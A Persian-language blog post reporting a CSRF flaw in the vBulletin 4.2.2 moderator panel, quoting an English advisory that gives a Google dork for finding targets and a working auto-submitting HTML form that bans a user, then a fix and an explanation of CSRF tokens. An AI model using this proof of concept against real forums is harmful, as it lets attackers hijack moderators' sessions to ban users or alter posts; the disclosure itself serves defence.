خانه کشف باگ CSRF در بخش مدیریت vBulletin 4.2.2

کشف باگ CSRF در بخش مدیریت vBulletin 4.2.2

4 زمان مورد نیاز برای خواندن
۰
0
55

باگ CSRF به تازگی یک آسیب پذیری جدید در بخش مدیریت vBulletin  کشف شده است . ظاهرا این باگ مربوط به ماژول CP این اسکریپت انجمن ساز معروف و پر طرفدار می باشد . و به دلیل private بودن این آسیب پذیری هنوز راه حلی برای رفع این مشکل پیدا نشده است . در ضمن این آسیب پذیری درمرورگر های فایرفاکس و گوگل کروم تست شده است و در صورت استفاده  از این مرورگر ها نیز از خطر حمله هکرها با استفاده از این آسیب پذیری در امان نیستید !

باگ CSRF

 

[quote font_size=”11″]

# Exploit Title: vBulletin Moderator Control Panel CSRF
# Google Dork: “Powered by vBulletin® Version 4.2.2”
# Date: 16-12-2014
# Exploit Author: Tomescu Daniel http://daniel-tomescu.com https://rstforums.com/forum
# Vendor Homepage: http://www.vbulletin.com/en/vb4-features/
# Software Link: Premium
# Version: vBulletin 4.2.2
# Tested on: Chrome and Firefox
# Reference: https://rstforums.com/forum/88810-csrf-vbulletin-modcp.rst

### ۱٫ Description

vBulletin Moderator Control Panel suffer from a CSRF vulnerability because the CSRF tokens “adminhash” and “securitytoken” are not verified in POST requests.

vBulletin has one additional protection against CSRF: checking the Referer header to be same origin. However this can be bypassed by making a POST request that does not have a Referer header.

This vulnerability allows an attacker to ban/unban users, to modify user profiles, to edit/approve posts and topics and so on.

### ۲٫ Proof of Concept

The attacker should target a moderator of target-forum.com and the moderator must be logged in Moderator Control Panel. The vulnerability can be exploited by tricking the moderator to visit a webpage that contains the following html code:

<iframe name=”ifr” frameborder=”0″ style=”overflow:hidden;height:1%;width:1%” height=”1%” width=”1%”
src=’data:text/html,
<html>
<body>
<iframe style=”display:none” name=”csrf-frame”></iframe>
<form style=”display:none” method=”POST” action=”https://target-forum.com/path-to/modcp/banning.php?do=dobanuser” target=”csrf-frame” id=”csrf-form”>
<input type=”hidden” name=”do” value=”dobanuser” >
<input type=”hidden” name=”adminhash” value=”” >
<input type=”hidden” name=”securitytoken” value=”” >
<input type=”hidden” name=”username” value=”UserToBeBanned” >
<input type=”hidden” name=”usergroupid” value=”8″ >
<input type=”hidden” name=”period” value=”D_7″ >
<input type=”hidden” name=”reason” value=”Banned with CSRF” >
<input type=”submit” value=”submit”>
</form>
<script> window.onload = function(){ document.getElementById(“csrf-form”).submit(); } </script>
</body>
</html>’>
</iframe>

As a result, the user with the username “UserToBeBanned” will be added to the banned users list.

### ۳٫ Solution:

Do not allow POST requests without a Referer header.
Verify “adminhash” and “securitytoken” to be valid.

[/quote]

باگ CSRF

اما باگ CSRF چیست ؟

Cross-Site Request Forgery یک آسیب پذیری در عملیات مخصوص کاربرهای یک سایت است که امکان میدهد این عملیات مخصوص مدیر یا کاربر بدون در نظر گرفتن شرایط امنیتی لازم با کلیک شدن بر روی یک لینک یا استفاده از یک SESSION  یا حتی مشاهده یک عکس توسط کاربر اتفاق بیفتد مثلا پسورد مدیر سایت تنها با کلیک کردن مدیر روی یک لینک ارسال شده در محیط چت یا ایمیل تغییر کند یا پول یا پیغامی به حساب کاربر دیگر منتقل شود بدون اینکه کنترل شود آیا کاربر واقعا قصد انجام این کار را دارد یا خیر . در واقع اینجا سایت به درخواست های ارسال شده از طرف کاربر اعتماد می کند در صورتی که کاربر از اتفاقی که در حال رخ دادن است مطلع نیست . معمولا برای رفع این مشکل امنیتی از token ها برای اطمینان از صحت درخواست کاربر استفاده می شود بطوری که درخواست های ارسالی به سایت باید حاوی یک توکن بوده که تنها از طریق سایت در اختیار کاربر قرار داده می شود و هکرها از آن مطلع نیستند و در صورتی که توکن ارسال شده به سایت با توکن کاربر مطابقت نداشته باشد درخواست رد می شود .

مقالات مرتبط بیشتر را بارگیری کنید
بارگزاری مطالب دیگر Ansel
Load More In 

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

شانزده − یک =

همچنین بررسی کنید

چگونه یک اپلیکیشن اندروید با Android Studio بسازیم ؟

در این آموزش اصول اولیه ساختن یک برنامه اندرویدی (اپلیکیشن اندروید) با استفاده از محیط توس…